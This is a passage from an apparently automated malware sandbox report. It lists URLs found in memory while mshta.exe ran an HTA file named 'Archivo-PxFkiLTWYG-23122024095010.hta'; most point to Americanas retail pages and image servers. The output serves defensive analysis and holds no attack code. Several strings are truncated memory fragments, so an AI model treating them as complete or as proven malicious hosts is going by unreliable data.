00000000.00000003.25460802201.0000000009466000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://empresas.americanas.com.br/?chave=brd_hm_tt_0_0_empresas
Source: mshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486409501.000000000A9C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401236979.000000000A9B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://empresas.americanas.com.br/?chave=brd_hm_tt_0_0_empresas4vK
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459239751.0000000009473000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484186260.0000000009474000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465598138.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459670621.000000000AA7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AAF9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464016855.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401685590.000000000ABFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486544314.000000000AA7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://empresas.americanas.com.br/?chave=menuacom_aemp_hmem
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459239751.0000000009473000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484186260.0000000009474000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://empresas.americanas.com.br/hotsite/empresas-cotacao-online?chave=menuacom_aemp_cotacoes
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459239751.0000000009473000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484186260.0000000009474000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://empresas.americanas.com.br/hotsite/receba-ou-retire-hoje?chave=menuacom_aemp_recebaem3h
Source: mshta.exe, 00000000.00000003.25462631431.0000000009447000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.0000000009516000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464408600.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384395809.000000000E52E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443295751.00000000093E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477560105.0000000009518000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25406098010.000000000E542000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A93E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398726849.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483889487.0000000009449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: mshta.exe, 00000000.00000003.25438991190.00000000096EA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438886718.0000000009704000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377467003.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317610092.00000000067E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438921649.0000000009C41000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25435995169.0000000009703000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432084842.0000000009C17000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25439024256.0000000009C18000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/60405799/imagens/ck-be-calvin-klein-eau-de-toilette-perfum
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395079124.0000000009491000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484313648.0000000009491000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A916000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000677A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009491000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404882839.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398775142.000000000A914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485566366.000000000A91B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2021/03/05/americanassocial_app.png
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2021/03/05/americanassocial_app.pngE
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405086721.000000000A91E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A916000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000677A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404882839.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398775142.000000000A914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485566366.000000000A91B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459330511.000000000A91B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/05/App-15b552bb657a.png
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/05/App-15b552bb657a.png.
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/05/App-15b552bb657a.pnglasM
Source: mshta.exe, 00000000.00000003.25396464078.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485163864.00000000095B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398590694.00000000095A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000095A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/05/App-15b552bb657a.pngx-cb8bf5b6c936.png
Source: mshta.exe, 00000000.00000003.25396464078.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383700341.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485163864.00000000095B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459330511.000000000A914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398775142.000000000A914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398590694.00000000095A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/08/thumbnail_BannerAPP_07-04-3ef281a2ba9f.jpg
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/08/thumbnail_BannerAPP_07-04-3ef281a2ba9f.jpg-
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/08/thumbnail_BannerAPP_07-04-3ef281a2ba9f.jpgc
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432134093.0000000009C45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478510709.000000000AC5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484225410.0000000009487000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395079124.0000000009491000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC5F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009491000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25436128428.0000000009C46000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009487000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/07/15/_informatica-a6061b57bcbc.png
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483197472.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478510709.000000000AC5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465160079.0000000006F1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC5F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386380678.000000000307C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/08/01/LG-Agosto-01082022_americanas-home-banner-TT
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483562137.0000000006F53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444845667.0000000009564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490021991.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395191337.0000000006F4B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484992429.0000000009565000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462814221.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/12/07/291422413_392978049367464_116978390465635854
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483197472.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465160079.0000000006F1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386380678.000000000307C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401903465.000000000AC27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479810428.000000000307D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/04/27/Samsung-1P-Abril-Contrato-RJ_americanas-home
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397591598.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.0000000009570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/05/12/espacamento-10-d905af122871.png(
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464408600.0000000009511000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/09/29/DESK_APP-ATL-S
